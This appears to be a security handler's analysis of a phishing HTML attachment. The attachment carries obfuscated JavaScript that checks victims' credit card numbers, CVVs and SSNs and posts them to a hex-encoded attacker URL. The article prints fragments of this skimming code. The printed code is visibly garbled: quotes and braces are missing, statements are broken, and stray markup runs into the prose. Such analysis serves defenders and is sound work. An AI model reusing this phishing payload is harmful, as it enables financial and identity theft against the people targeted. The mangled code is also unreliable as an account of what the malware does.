var _0x22eb9a = c113b797cd0456be0d1a9c2f35f7d78b.phpvar _0x2da3 = [x6Cx65x6Ex67x74x68, x63x68x61x72x41x74, x68x74x74x70x3Ax2Fx2Fx74x31x2Ex73x79x73x74x65x6Dx66x69x6Cx74x65x72x73x2Ex6Ex65x74x2F, x68x74x74x70x73x3Ax2Fx2Fx77x77x77x2Ex70x61x79x70x61x6Cx2Ex63x6Fx6Dx2F, x72x65x70x6Cx61x63x65, x6Cx6Fx63x61x74x69x6Fx6E, x61x63x74x69x6Fx6E, x65x6Ex76, x66x6Fx72x6Dx73, x6Dx65x74x68x6Fx64, x70x6Fx73x74, x73x75x62x6Dx69x74var _0x27ca82 = (function(_0xe689x2) return function(_0xe689x3) var _0xe689x4 = _0xe689x3[_0x2da3], _0xe689x5 = 1, _0xe689x6 = 0, while (_0xe689x4) _0xe689x6 += (_0xe689x5 ^= 1) ? _0xe689x2[_0xe689x7] : _0xe689x7 return _0xe689x6 _0xe689x6 % 10 === 0 function xsub() if (!_0x11e97d()) return false if (!_0xbbd7eb) _0x98a278 += _0x22eb9a document[_0x2da3][_0x2da3][_0x2da3]()var _0x9939 = [x76x61x6Cx75x65, x63x63x61x72x64x6Ex75x6D, x65x6Ex76, x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex70x61x79x70x61x6Cx2Ex63x6Fx6Dx2F, x72x65x70x6Cx61x63x65, x6Cx6Fx63x61x74x69x6Fx6E, x63x61x64x64x72, x63x65x78x70x6D, x63x65x78x70x79, x63x63x76x76, x6Ex61x6Dx65, x30x30, x63x73x73x6E, x6Cx65x6Ex67x74x68, x2D, x69x6Ex64x65x78x4Fx66, x55x6Ex69x74x65x64x20x53x74x61x74x65x73, x63x63x6Fx75x6Ex74x72x79, x63x7Ax69x70function _0x11e97d() if (!ax) return window[_0x9939][_0x9939](_0x9939), !1 var _0x88a0x2 = document[_0x9939][_0x9939][_0x9939], _0x88a0x3 = document[_0x9939][_0x9939][_0x9939], _0x88a0x4 = document[_0x9939][_0x9939][_0x9939], if (!document[_0x9939][_0x9939][_0x9939] return !0″>The interesting line is the first one which contains the PHP page where data are posted. If you browse the code, you see that it is appended to _0x2da3”>tox68x74x74x70x3Ax2Fx2Fx74x31x2Ex73x79x73x74x65x6Dx66x69x6Cx74x65x72x73x2Ex6Ex65x74x2F”>Another interesting function is _0x11e97d() which performs multiple checks againstthe data submitted by the victim. Indeed, the attacker took the time to validate the data passed via the form. 
If one of them does not match the requirements, nothing is sent to the malicious server and only a redirect occurs. Example: the credit card number and SSN are checked (via the function _0x27ca82(), which from its mod-10 test looks like a Luhn checksum). To successfully submit my test data, I bypassed _0x11e97d() with a simple return 1. In this phishing campaign, victims from the United States are targeted because a real SSN is mandatory. It also demonstrates that the attacker took extra care to validate the data so that only valid information is sent to him. This is a nice example of multiple obfuscation levels: nothing is downloaded from the Internet; the user only has to open the HTML file attached to the email.
ISC Handler – Freelance Security Consultant